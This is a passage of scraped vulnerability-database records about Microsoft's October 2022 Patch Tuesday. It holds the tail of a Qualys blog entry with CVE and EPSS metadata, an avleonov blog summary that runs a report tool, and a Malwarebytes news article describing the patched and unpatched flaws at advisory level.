[**CONFERENCES**](<https://www.qualys.com/qsc/locations/>)\n\n[](<https://www.qualys.com/qsc/2022/las-vegas/?utm_source=qualys-homepage&utm_medium=event&utm_campaign=homepage-banner-qsc-2022&utm_term=qsc-q4-2022&utm_content=qualys-homepage-qsc&leadsource=344572821>)\n\n[Register Now](<https://www.qualys.com/qsc/2022/las-vegas/register/>)\n\n## [Qualys Annual Security Conference](<https://tinyl.io/79BB>) #QSC22\n\nQualys Security Conference (QSC) is a unique opportunity for the Qualys community to get together to hear the latest developments in cybersecurity, view the latest innovations from Qualys, trade best practices, share feedback, and learn tips and tricks on how security professionals work to keep their organizations secure.\n\n## We are pleased to announce the keynote speaker for the 2022 Qualys Annual Security Conference in Las Vegas\n\n\n\nRobert Herjavec is a globally recognized motivational, business, and cyber security leader. For the last 14 years, Robert has been well known as one of the Sharks, and executive producer of the Emmy Award-winning hit show, Shark Tank. He has served as a Cybersecurity Advisor for the Government of Canada, participated in the White House Summit on Cybersecurity, and is a member of the US Chamber of Commerce Task Force for Cybersecurity.\n\nRobert\u2019s keynote will highlight the growing importance of cybersecurity in today\u2019s world.\n\n* * *\n\n**Explore and secure the digital journey.** Dive into the profound impact of the digital journey and explore how to build security automation from the data center to the cloud. Industry experts and Qualys leaders discuss automation strategies, preview product roadmaps, listen to your challenges, and answer your questions.\n\n**Get inspired.** Engage with Qualys\u2019 customer-facing teams and your peers around best practices and user case studies for applying security automation to real-world challenges.\n\n**Sharpen your expertise. **Two days of free training cover forward-looking strategies, best practices to improve effectiveness and productivity, and core/expanded product features to up-level your security program.\n\n**Who Should Attend? **CIOs, CSOs, and CTOs; directors and managers of network, security, and cloud; developers and DevSecOps practitioners; Qualys partners and consultants; or any forward-thinking security professional.\n\n## Live **Training Sessions**\n\n## [November 7](<https://www.qualys.com/qsc/2022/las-vegas/?utm_source=qualys-homepage&utm_medium=event&utm_campaign=homepage-banner-qsc-2022&utm_term=qsc-q4-2022&utm_content=qualys-homepage-qsc&leadsource=344572821#nov7>) and [November 8](<https://www.qualys.com/qsc/2022/las-vegas/?utm_source=qualys-homepage&utm_medium=event&utm_campaign=homepage-banner-qsc-2022&utm_term=qsc-q4-2022&utm_content=qualys-homepage-qsc&leadsource=344572821#nov8>)\n\n* * *\n\n## Live **Conference Sessions**\n\n## [November 9](<https://www.qualys.com/qsc/2022/las-vegas/?utm_source=qualys-homepage&utm_medium=event&utm_campaign=homepage-banner-qsc-2022&utm_term=qsc-q4-2022&utm_content=qualys-homepage-qsc&leadsource=344572821#nov9>) and [November 10](<https://www.qualys.com/qsc/2022/las-vegas/?utm_source=qualys-homepage&utm_medium=event&utm_campaign=homepage-banner-qsc-2022&utm_term=qsc-q4-2022&utm_content=qualys-homepage-qsc&leadsource=344572821#nov10>)\n\n_Attendance at QSC is complimentary. This includes access to all general sessions, breakout sessions, breakfast, lunch, breaks, and receptions._\n\n* * *\n\n#### #QSC22 Location and Reservation Information\n\nNovember 7-10, 2022\n\nThe Venetian Resort Las Vegas, 3355 Las Vegas Blvd. South, Las Vegas, NV 89109, US\n\n[Book your hotel here](<https://book.passkey.com/gt/218594637?gtid=9914abda1b2fe722d872e0ac3e0bdc09>) &amp; take advantage of the discounted QSC rate of $229+ per night\n\nOr find a conference [near you](<https://www.qualys.com/qsc/locations/>).\n\n* * *\n\n## This month&#x27;s blog content is the result of collaboration with and contributions from:\n\n_In order of appearance_\n\n * Quote: [Ankit Malhotra](<https://blog.qualys.com/author/amalhotra>), Manager, Signature Engineering\n * Quote: [Saeed Abbasi](<https://blog.qualys.com/author/sabbasi>), Manager, Vulnerability Signatures\n * QID Content: Arun Kethipelly, Manager, Signature Engineering\n * QID Content: Dianfang (Sabrina) Gao, Lead, QA Engineer\n * CAR Content: Mukesh Choudhary, Compliance Research Analyst\n * CAR Content: [Lavish Jhamb](<https://blog.qualys.com/author/ljhamb>), Solution Architect, Compliance Solutions\n * PC Content: Xiaoran (Alex) Dong, Manager, Compliance Signature Engineering\n * Webinars: Thomas Nuth, Senior Director, Product Marketing\n * Webinars: Nihal Adav, Email Marketing Specialist\n * #QSCLV22 Content: Anna Moraleda, Sr. Marketing Events Specialist\n\n* * *", "published": "2022-10-11T20:00:00", "modified": "2022-10-11T20:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 10.0, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 6.0}, "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "reporter": "Debra M. Fezza Reed", "references": [], "cvelist": ["CVE-2022-30134", "CVE-2022-3236", "CVE-2022-32894", "CVE-2022-33645", "CVE-2022-34689", "CVE-2022-35405", "CVE-2022-37968", "CVE-2022-37976", "CVE-2022-38048", "CVE-2022-40139", "CVE-2022-40684", "CVE-2022-41033", "CVE-2022-41035", "CVE-2022-41038", "CVE-2022-41040", "CVE-2022-41043", "CVE-2022-41082", "CVE-2022-41352"], "immutableFields": [], "lastseen": "2022-10-19T22:05:19", "viewCount": 241, "enchantments": {"dependencies": {"references": [{"type": "akamaiblog", "idList": ["AKAMAIBLOG:0287B84AF09C377FDC8D475774722858"]}, {"type": "apple", "idList": ["APPLE:5D20BFFCE6B79E6E7DF122C3E4FF65AC", "APPLE:94E98E15A096BFEBBCA4E7BF7D3D6C7D", "APPLE:CF4E2FCD25E41260852DC0DC2428E0AC", "APPLE:F99F855A2C143ACC1F38687F55E85474"]}, {"type": "attackerkb", "idList": ["AKB:288E3CA7-1388-488A-81D9-E93EDFFAA221", "AKB:7734F7C5-D029-4C2D-9E33-DEBEABF4E7FF", "AKB:82991046-210F-4C54-A578-8E09BD9F6D88", "AKB:9BEA97BB-44E8-4F50-B014-1DF399424D7C", "AKB:9EA74C88-E0C0-4B13-802D-551307F35B3F", "AKB:A0C8E5E1-E212-4D46-97F4-2C5A5F8F05F2", "AKB:B18222FB-1EF5-4D55-899B-61BD7ECF0FAA", "AKB:C27C2E8E-E83A-4BF5-A465-C31AC3D7B61B", "AKB:C3925834-0CCF-4765-9D28-EB57DD180308"]}, {"type": "cert", "idList": ["VU:915563"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2022-0628"]}, {"type": "cisa", "idList": ["CISA:8ED5E84007437E9B88D2418732B63E04"]}, {"type": "cisa_kev", "idList": ["CISA-KEV-CVE-2022-3236", "CISA-KEV-CVE-2022-32894", "CISA-KEV-CVE-2022-35405", "CISA-KEV-CVE-2022-40139", "CISA-KEV-CVE-2022-40684", "CISA-KEV-CVE-2022-41033", "CISA-KEV-CVE-2022-41040", "CISA-KEV-CVE-2022-41082"]}, {"type": "cnvd", "idList": ["CNVD-2022-58457", "CNVD-2022-67488", "CNVD-2022-67837", "CNVD-2022-67838"]}, {"type": "cve", "idList": ["CVE-2022-21979", "CVE-2022-30134", "CVE-2022-3236", "CVE-2022-32894", "CVE-2022-33645", "CVE-2022-34689", "CVE-2022-34692", "CVE-2022-35405", "CVE-2022-37968", "CVE-2022-37976", "CVE-2022-38048", "CVE-2022-38053", "CVE-2022-40139", "CVE-2022-40684", "CVE-2022-41033", "CVE-2022-41035", "CVE-2022-41036", "CVE-2022-41037", "CVE-2022-41038", "CVE-2022-41040", "CVE-2022-41043", "CVE-2022-41082", "CVE-2022-41352"]}, {"type": "fortinet", "idList": ["FG-IR-22-377"]}, {"type": "githubexploit", "idList": ["031A1BA5-EA1C-586D-8614-7558CCA5FCCB", "04705DD0-6F67-5847-B368-4ADB734EC12B", "0AA01487-E0E5-59CB-9A45-A5DE55F290A6", "0E54CE3B-3E70-59B7-BB6B-AC20C8611B38", "17DBAF5D-D221-53A1-8663-721B510E680E", "244EBCF8-4EF3-5D5B-8E3E-A832A56B7BF3", "25BE038D-91D2-5791-834B-358DB34357A7", "2DFE744C-4369-56D5-9FEA-348B4150C298", "33F59131-F1BD-56AB-8BB7-C960EFF9223C", "3410A018-A761-5411-8E58-892F756D299A", "346026AA-22B5-5F79-9544-28E8E7CFE3F2", "3722FF3F-D30D-5D5C-802E-EEA4963C6848", "45B1ADFF-A2FE-5D13-8750-9FC8E5ED13D5", "480AA36A-BFDC-54DD-AE13-43A3FE97ADCE", "501F0379-518B-5CB0-B332-836278230678", "553EF29F-6CB4-5F8F-91AD-85FC945A94E0", "567E25A0-124E-58B5-BAF5-B7651C9D74AA", "58C7CDFB-F328-57B4-ACE6-CA3966DB0EEB", "5C16D945-0879-5E51-B2AF-B106F633656A", "6064317C-299E-530F-81F1-F80C282AE68A", "6776EABD-28C1-5A42-8AB2-27BD7F492078", "68CEC596-CECA-5540-8E84-58E2E9786D22", "6D79D6F9-CC56-5F97-B1DD-2CDEE0AEC608", "6E208382-5651-5649-B6C1-F9EF3A08EA81", "77197575-9978-5136-A83D-F5FF790F2F34", "84344B5F-D0D1-5F17-B938-9A8849618A51", "87179042-CF32-5495-87D0-B916B42259D2", "931DCD2F-FC40-5BD3-B714-6045BAAD1857", "9905FF79-0EE2-5313-9486-DA71B70A3D88", "9945D2DB-9314-5400-8C2B-94D4BD603DD9", "A35BD9D8-6888-5724-BF89-A3A7D384D280", "A74FC70F-51E2-5B48-AC8B-D73376E8A78F", "B208F2B7-D166-5757-A090-CC1A91C9D376", "B6C642BC-915E-52EA-80B0-BC40EDC884CC", "B8464218-31FA-569A-AC74-26B347DEC285", "B8E34E3E-3FE6-5DA6-935C-2A0517D15077", "BC7AA745-CDB6-554E-B6CC-A50E97B7ECE5", "BD07E529-B3E2-5CB8-ACD4-AD7DAD69AFBD", "CDC28FA3-9C62-5164-A646-234AC30C0DA0", "CF3485E1-2E99-580B-BC50-D61EA587BA40", "D1B3FEF9-9547-51C2-B6FC-92642E47B144", "D52F3F41-2E8A-5FC2-AA35-BC6707158F1A", "D58D53CD-D047-5570-B473-DEFF8E3B0225", "D6B062D5-F610-54D9-8FD2-EFE6E9D2F8BD", "D7FAABC0-C6C7-55D7-B5DB-C0585EB16921", "E4395A48-164E-527F-8B5B-1A44D3F379B6", "E8033F3F-24AB-5402-AEA7-5583EDDC76C9", "E88B092A-CAC3-5E4D-AA85-1C01600A7A46", "EBFC1543-13D3-549C-A3B9-A6E4B17E7555", "FA1424FC-DEEC-59EB-A204-0082D635BE7E", "FE6D7F99-F6AF-559F-93A5-786367B77158"]}, {"type": "hackerone", "idList": ["H1:1719719"]}, {"type": "hackread", "idList": ["HACKREAD:E34C6E8908AE56B0B1176B1237BFDF36"]}, {"type": "hivepro", "idList": ["HIVEPRO:191275C5ECED2A57E4265562184B48DA", "HIVEPRO:33F7ACF184167B2BC236A12082041131", "HIVEPRO:621DD8CA375634712F01438EF8C1AE13", "HIVEPRO:B4C85BEFF3E49468BE44E35CEC3A7DE6", "HIVEPRO:CCB5F51160D6B20ECA6FFFB5297C4704", "HIVEPRO:F327ABE1BEFB40043AD5F33DA5692070"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:2303181B17E64D6C752ACD64C5A2B39C"]}, {"type": "jvn", "idList": ["JVN:36454862"]}, {"type": "kaspersky", "idList": ["KLA12608", "KLA19264", "KLA19267", "KLA20000", "KLA20001", "KLA20002", "KLA20004"]}, {"type": "krebs", "idList": ["KREBS:04BF4A7775A9C0B7DE1A20C71586245A", "KREBS:6E25B247DFBFC9267C00F36CE0695768", "KREBS:E877FCDD28FB558BB4B6AFF240F30EA8"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:1E762A45A948B3FD9F8A8DC65D028095", "MALWAREBYTES:2B7FA24A43BE3D53EA1E393BEC594625", "MALWAREBYTES:570936F207FD4A3EB4366346C255209A", "MALWAREBYTES:6B076C11790BA7213FDAD04636FDD786", "MALWAREBYTES:9446395F8878B21ADE37FDE8E05D9D37", "MALWAREBYTES:A165959E3A462AF8315F01F1020BBF53", "MALWAREBYTES:DDF3883C3A8B9A70629872FE83522C17", "MALWAREBYTES:E9F8D9962C90DF0556F1F4180FFAA7D7"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT-WINDOWS-HTTP-ZOHO_PASSWORD_MANAGER_PRO_XML_RPC_RCE-"]}, {"type": "mmpc", "idList": ["MMPC:C857BFAD4920FD5B25BF42D5469945F6"]}, {"type": "mscve", "idList": ["MS:CVE-2022-21979", "MS:CVE-2022-30134", "MS:CVE-2022-33645", "MS:CVE-2022-34689", "MS:CVE-2022-34692", "MS:CVE-2022-37968", "MS:CVE-2022-37976", "MS:CVE-2022-38048", "MS:CVE-2022-38053", "MS:CVE-2022-41033", "MS:CVE-2022-41035", "MS:CVE-2022-41036", "MS:CVE-2022-41037", "MS:CVE-2022-41038", "MS:CVE-2022-41040", "MS:CVE-2022-41043", "MS:CVE-2022-41082"]}, {"type": "mskb", "idList": ["KB5002026", "KB5002278", "KB5002279", "KB5002283", "KB5002284", "KB5002287", "KB5002288", "KB5002290", "KB5015321", "KB5015322", "KB5016616", "KB5016622", "KB5016623", "KB5016627", "KB5016629", "KB5016639", "KB5016669", "KB5016672", "KB5016676", "KB5016679", "KB5016681", "KB5016683", "KB5016684", "KB5016686", "KB5019076", "KB5019077"]}, {"type": "mssecure", "idList": ["MSSECURE:C857BFAD4920FD5B25BF42D5469945F6"]}, {"type": "nessus", "idList": ["APPLE_IOS_1561_CHECK.NBIN", "EXCHANGE_CVE-2022-41040_IOC.NBIN", "FORTIGATE_FG-IR-22-377.NASL", "MACOS_HT213413.NASL", "MACOS_HT213443.NASL", "MACOS_MS22_OCT_OFFICE.NASL", "MANAGEENGINE_ACCESS_MANAGER_PLUS_4303.NASL", "MANAGEENGINE_PAM360_5510.NASL", "MANAGEENGINE_PMP_12101.NASL", "MICROSOFT_EDGE_CHROMIUM_106_0_1370_34.NASL", "SMB_NT_MS22_AUG_EXCHANGE.NASL", "SMB_NT_MS22_OCT_5018410.NASL", "SMB_NT_MS22_OCT_5018411.NASL", "SMB_NT_MS22_OCT_5018418.NASL", "SMB_NT_MS22_OCT_5018419.NASL", "SMB_NT_MS22_OCT_5018421.NASL", "SMB_NT_MS22_OCT_5018425.NASL", "SMB_NT_MS22_OCT_5018446.NASL", "SMB_NT_MS22_OCT_5018476.NASL", "SMB_NT_MS22_OCT_5018478.NASL", "SMB_NT_MS22_OCT_5018479.NASL", "SMB_NT_MS22_OCT_EXCHANGE.NASL", "SMB_NT_MS22_OCT_EXCHANGE_ZERODAY.NASL", "SMB_NT_MS22_OCT_OFFICE.NASL", "SMB_NT_MS22_OCT_OFFICE_SHAREPOINT_2013.NASL", "SMB_NT_MS22_OCT_OFFICE_SHAREPOINT_2016.NASL", "SMB_NT_MS22_OCT_OFFICE_SHAREPOINT_2019.NASL", "SMB_NT_MS22_OCT_OFFICE_SHAREPOINT_SUBSCR.NASL", "SMB_NT_MS22_OCT_WORD_C2R.NASL", "TRENDMICRO_APEX_ONE_000291528.NASL", "ZIMBRA_8_8_15_P34.NASL", "ZIMBRA_9_0_0_P27.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:167918", "PACKETSTORM:169431"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:68BE1D9A35C7B4F036FE7BC4965732CC", "QUALYSBLOG:89B0E9C4C12FFA944639C5B7B34594DB", "QUALYSBLOG:AC756D2C7DB65BB8BC9FBD558B7F3AD3", "QUALYSBLOG:DE2E40D3BB574E53C7448F3A304849C9"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:2BF1C4EA2B7AB37B7A16840E193AAC4B", "RAPID7BLOG:4E867F9E4F1818A4F797C0C8A1E26598", "RAPID7BLOG:882168BD332366CE296FB09DC00E018E", "RAPID7BLOG:90A5B4252807D9A3550CB8449AA62109", "RAPID7BLOG:9191651E2ECCE625AEB7BDCAD1EA43F6", "RAPID7BLOG:B37CF2E44EB6AA38B417BB09297CD3E1", "RAPID7BLOG:FBEE52CB3C438E4C42D6212E07BEFEA9"]}, {"type": "securelist", "idList": ["SECURELIST:D585E099ED8B144A608D3789C2190854"]}, {"type": "talosblog", "idList": ["TALOSBLOG:12103F398364269083FD96139F0F6562", "TALOSBLOG:53D093A8C1C443878386CF6F108BED03", "TALOSBLOG:A0B0983119E043D75EA7712A7172A942", "TALOSBLOG:E5CB52FAF6F4E4360A360412C9377097", "TALOSBLOG:FC6B0635136460B7A28F081107A8712E"]}, {"type": "thn", "idList": ["THN:0521233945B9471C64D546BD2B006823", "THN:0F44740E1DC86B52AFAEA1D981FF08AE", "THN:221BD04ADD3814DC78AF58DFF41861F3", "THN:3474CD6C25ADD60FF37EDC1774311111", "THN:5293CFD6ACCF7BFD2EDDE976C7C06C15", "THN:54023E40C0AA4CB15793A39F3AF102AB", "THN:57FE6668281A6858EDE70EDE8EEDEE94", "THN:63560DA43FB5804E3B258BC62E210EC4", "THN:6B72050A86FFDCE9A0B2CF6F44293A1B", "THN:6C7E32993558CB9F19CAE15C18522582", "THN:7A0BB9AD4437D8A1043E4BE4BA0E915C", "THN:8200D2C2E1DD329D680C5E699177551B", "THN:8EF2325CBAF6720C51D9798925FE61A0", "THN:A5B36072ED31304F26AF0879E3E5710E", "THN:A60A19BF44B2CA75E63F31234992BE54", "THN:DEAEC76D89D5583101E2E6036C289609", "THN:F1EF1783ED4A37EF5E895A40CFF1DA31", "THN:FCEF4EA34B53C743863FE92365E26AFF"]}, {"type": "threatpost", "idList": ["THREATPOST:DCD8C6A45F83A5C79CA1807D2B2A4A41"]}, {"type": "wordfence", "idList": ["WORDFENCE:035A383C0D3B38D6EEBF9FE95D1A356D", "WORDFENCE:98268684EA16A81FCA6F004B3CE9D86A"]}, {"type": "zdi", "idList": ["ZDI-22-1411", "ZDI-22-1441", "ZDI-22-1442"]}, {"type": "zdt", "idList": ["1337DAY-ID-37890", "1337DAY-ID-38045"]}]}, "score": {"value": 0.0, "vector": "NONE"}, "epss": [{"cve": "CVE-2022-30134", "epss": "0.000740000", "percentile": "0.300280000", "modified": "2023-03-19"}, {"cve": "CVE-2022-3236", "epss": "0.114790000", "percentile": "0.943150000", "modified": "2023-03-19"}, {"cve": "CVE-2022-32894", "epss": "0.000740000", "percentile": "0.299620000", "modified": "2023-03-19"}, {"cve": "CVE-2022-33645", "epss": "0.000940000", "percentile": "0.383930000", "modified": "2023-03-19"}, {"cve": "CVE-2022-34689", "epss": "0.002240000", "percentile": "0.589070000", "modified": "2023-03-19"}, {"cve": "CVE-2022-35405", "epss": "0.973990000", "percentile": "0.998340000", "modified": "2023-03-19"}, {"cve": "CVE-2022-37968", "epss": "0.002280000", "percentile": "0.592430000", "modified": "2023-03-19"}, {"cve": "CVE-2022-37976", "epss": "0.000660000", "percentile": "0.267950000", "modified": "2023-03-19"}, {"cve": "CVE-2022-38048", "epss": "0.001140000", "percentile": "0.434450000", "modified": "2023-03-19"}, {"cve": "CVE-2022-40139", "epss": "0.006330000", "percentile": "0.758300000", "modified": "2023-03-19"}, {"cve": "CVE-2022-40684", "epss": "0.974510000", "percentile": "0.998980000", "modified": "2023-03-19"}, {"cve": "CVE-2022-41033", "epss": "0.002040000", "percentile": "0.566230000", "modified": "2023-03-19"}, {"cve": "CVE-2022-41035", "epss": "0.000930000", "percentile": "0.382430000", "modified": "2023-03-19"}, {"cve": "CVE-2022-41038", "epss": "0.003830000", "percentile": "0.688370000", "modified": "2023-03-19"}, {"cve": "CVE-2022-41040", "epss": "0.951500000", "percentile": "0.988580000", "modified": "2023-03-19"}, {"cve": "CVE-2022-41043", "epss": "0.000440000", "percentile": "0.083420000", "modified": "2023-03-19"}, {"cve": "CVE-2022-41082", "epss": "0.970140000", "percentile": "0.995460000", "modified": "2023-03-19"}, {"cve": "CVE-2022-41352", "epss": "0.969950000", "percentile": "0.995330000", "modified": "2023-03-19"}], "vulnersScore": 0.0}, "_state": {"dependencies": 1666217282, "score": 1666218028, "epss": 1679305952}, "_internal": {"score_hash": "ec7253e60e1dd8bea7b611fa3bd51297"}}

{"avleonov": [{"lastseen": "2022-10-29T17:09:42", "description": "Hello everyone! This episode will be about Microsoft Patch Tuesday for October 2022, including vulnerabilities that were added between September and October Patch Tuesdays. As usual, I use my open source [Vulristics](<https://github.com/leonov-av/vulristics>) project to create the report.\n\nAlternative video link (for Russia): <https://vk.com/video-149273431_456239106>\n \n \n $ cat comments_links.txt \n Qualys|October 2022 Patch Tuesday|https://blog.qualys.com/vulnerabilities-threat-research/2022/10/11/october-2022-patch-tuesday\n ZDI|THE OCTOBER 2022 SECURITY UPDATE REVIEW|https://www.zerodayinitiative.com/blog/2022/10/11/the-october-2022-security-update-review\n \n $python3.8 process_classify_ms_products.py # Automated classifier for Microsoft products\n \n $ python3.8 vulristics.py --report-type \"ms_patch_tuesday_extended\" --mspt-year 2022 --mspt-month \"October\" --mspt-comments-links-path \"comments_links.txt\" --rewrite-flag \"True\"\n ...\n MS PT Year: 2022\n MS PT Month: October\n MS PT Date: 2022-10-11\n MS PT CVEs found: 84\n Ext MS PT Date from: 2022-09-14\n Ext MS PT Date to: 2022-10-10\n Ext MS PT CVEs found: 21\n ALL MS PT CVEs: 105\n ...\n\nAll vulnerabilities: 105 \nUrgent: 2 \nCritical: 1 \nHigh: 29 \nMedium: 71 \nLow: 2\n\nLet&#x27;s take a look at the most interesting vulnerabilities:\n\n 1. Two vulnerabilities **Remote Code Execution** - Microsoft Exchange (CVE-2022-41040, CVE-2022-41082). This is the hyped ProxyNotShell, that were disclosed on September 28. The first CVE is a **Server-Side Request Forgery (SSRF)** vulnerability, and the second one allows **Remote Code Execution (RCE)** when PowerShell is accessible to the attacker. While Microsoft was relatively [quick to acknowledge the vulnerabilities](<https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/>) and provide mitigation steps, their guidance has continually changed as the recommended rules to block attack traffic get bypassed. There were no patches for more than a month. At the same time, there are public exploits and signs of exploitation in the wild. Let&#x27;s wait for patches to appear on the Microsoft website on the pages for [CVE-2022-41040](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41040>) and [CVE-2022-41082](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41082>).\n 2. **Elevation of Privilege** - Windows COM+ Event System Service (CVE-2022-41033). This patch fixes a bug that Microsoft lists as being used in active attacks. The impact of exploitation is loss of confidentiality, integrity, and availability. Microsoft has not disclosed how the vulnerability is being exploited or if it is being exploited in targeted or more widespread attacks. They only say that the attack complexity is low and that it requires no user interaction for the attacker to be able to achieve SYSTEM privileges. An attacker who successfully exploited this vulnerability could gain SYSTEM privileges.\n 3. In this Patch Tuesday, there were 3 vulnerabilities for which the existence of a publicly available exploit was mentioned in the Microsoft CVSS Temporal Score (Proof-of-Concept Exploit). VM vendors didn&#x27;t write much about them. But it seems to me that the existence of a non-public PoC is an important enough factor to draw attention to these vulnerabilities: **Remote Code Execution** - Windows Point-to-Point Tunneling Protocol (CVE-2022-38000), **Elevation of Privilege** - Windows Graphics Component (CVE-2022-38051), **Spoofing** - Microsoft Edge (CVE-2022-41035).\n 4. **Elevation of Privilege** - Active Directory (CVE-2022-37976). A malicious DCOM client could force a DCOM server to authenticate to it through the Active Directory Certificate Service (ADCS) and use the credential to launch a cross-protocol attack. An attacker who successfully exploited this vulnerability could gain domain administrator privileges. Exploitability Assessment: Exploitation Less Likely.\n 5. **Elevation of Privilege** - Azure Arc-enabled Kubernetes cluster Connect (CVE-2022-37968). This vulnerability has CVSSv3 score of 10, the highest possible rating. An unauthenticated attacker could exploit this vulnerability in order to gain administrative privileges for a Kubernetes cluster. While updates have been released, users that do not have auto-upgrade enabled must take action to manually upgrade Azure Arc-enabled Kubernetes clusters.\n 6. **Remote Code Execution** - Microsoft Office (CVE-2022-38048). This bug was reported to the ZDI (Zero Day Initiative) by the researcher known as \u201chades_kito\u201d and represents a rare Critical-rated Office bug. Most Office vulnerabilities are rated Important since they involve user interaction \u2013 typically opening a file. An exception to that is when the Preview Pane is an attack vector, however, Microsoft states that isn\u2019t the case here. Likely the rating results from the lack of warning dialogs when opening a specially crafted file.\n\nFull Vulristics report: [ms_patch_tuesday_october2022](<https://avleonov.com/vulristics_reports/ms_patch_tuesday_october2022_report_with_comments_ext_img.html>)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-10-29T08:37:59", "type": "avleonov", "title": "Microsoft Patch Tuesday October 2022: Exchange ProxyNotShell RCE, Windows COM+ EoP, AD EoP, Azure Arc Kubernetes EoP", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-37968", "CVE-2022-37976", "CVE-2022-38000", "CVE-2022-38048", "CVE-2022-38051", "CVE-2022-41033", "CVE-2022-41035", "CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-10-29T08:37:59", "id": "AVLEONOV:58634A9ABF4922115976139024831EB9", "href": "https://avleonov.com/2022/10/29/microsoft-patch-tuesday-october-2022-exchange-proxynotshell-rce-windows-com-eop-ad-eop-azure-arc-kubernetes-eop/", "cvss": {"score": 0.0, "vector": "NONE"}}], "malwarebytes": [{"lastseen": "2022-10-13T00:05:49", "description": "Microsoft fixed 84 vulnerabilities in its October 2022 Patch Tuesday updates. Thirteen of them received the classification 'Critical'. Among them are a zero-day vulnerability that's being actively exploited, and another that hasn&#x27;t been spotted in the wild yet.\n\nThe bad news is that the much-desired fix for the \"ProxyNotShell\" [Exchange vulnerabilities](<https://www.malwarebytes.com/blog/news/2022/09/two-new-exchange-zero-days-that-look-and-feel-like-proxyshell-part-2>) was not included.\n\n## What was fixed\n\nA widely accepted [definition for a zero-day](<https://en.wikipedia.org/wiki/Zero-day_\\(computing\\)>) is a computer-software vulnerability previously unknown to those who should be interested in its mitigation, such as the software vendor. Until the vulnerability is mitigated, hackers can exploit it to adversely affect programs, data, computers or a network.\n\nAs such, a publicly known vulnerability is called a zero-day even if there is no known actively used exploitation for it.\n\nThe actively exploited vulnerability in this month's batch is [CVE-2022-41033](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41033>), a vulnerability with a [CVSS score](<https://www.malwarebytes.com/blog/news/2020/05/how-cvss-works-characterizing-and-scoring-vulnerabilities>) of 7.8 out of 10. This is described as a 'Windows COM+ Event System Service Elevation of Privileges (EoP)&#x27; vulnerability, which gives an attacker the potential to obtain SYSTEM privileges after successful exploitation.\n\nThis type of vulnerability usually comes into play once an attacker has gained an initial foothold on a system. They can then use this vulnerability to gain more permissions and expand their access to the compromised system.\n\nAnother publicly disclosed vulnerability that gets a fix is [CVE-2022-41043](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41043>), a Microsoft Office Information Disclosure vulnerability. Affected products are Microsoft Office LTSC for Mac 2021 and Microsoft Office 2019 for Mac. Microsoft says attackers could use this vulnerability to gain access to users' authentication tokens.\n\n## What wasn&#x27;t fixed\n\nThe Exchange Server \"ProxyNotShell\" vulnerabilities, [CVE-2022-41040](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41040>) and [CVE-2022-41082](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41082>), were not fixed in this round of updates. One is a Server-Side Request Forgery (SSRF) vulnerability and the other a remote code execution (RCE) vulnerability that exists when PowerShell is accessible to the attacker. The two can be chained together into an attack.\n\nMicrosoft says it will release updates for these vulnerabilities when they are ready. In the meantime, you should read [this blog post](<https://techcommunity.microsoft.com/t5/exchange-team-blog/customer-guidance-for-reported-zero-day-vulnerabilities-in/ba-p/3641494>) to learn about mitigations for those vulnerabilities.\n\n## Other vendors\n\nOther vendors have synchronized their periodic updates with Microsoft. Here are few major ones:\n\n * Adobe released [security updates](<Adobe%20also%20released%20security%20updates%20to%20fix%2029%20vulnerabilities>) to fix 29 vulnerabilities in several products.\n * Apple published [iOS 16.0.3](<https://support.apple.com/en-us/HT213480>).\n * Fortinet released important [security updates](<https://www.bleepingcomputer.com/news/security/fortinet-warns-admins-to-patch-critical-auth-bypass-bug-immediately/>).\n * Google patched several vulnerabilities for [Android](<https://www.malwarebytes.com/blog/news/2022/10/vulnerabilities-in-google-android-could-allow-for-arbitrary-code-execution>).\n * Samsung has started rolling out October 2022 [security updates](<https://androidstories.com/2022/10/12/samsung-2022-security-update-rolling-out-for-these-galaxy-phones/>) for some of its devices.\n * SAP has released [updates](<https://dam.sap.com/mac/app/e/pdf/preview/embed/ucQrx6G?ltr=a&rc=10>) for several of its products.\n * VMware published security advisory [VMSA-2022-0025](<https://www.vmware.com/security/advisories/VMSA-2022-0025.html>).\n * Xiaomi released the October 2022 [Security Patch Update tracker](<https://xiaomiui.net/xiaomi-october-2022-security-patch-update-tracker-36308/>).\n\nThat should be enough to keep you busy, et patching!", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": 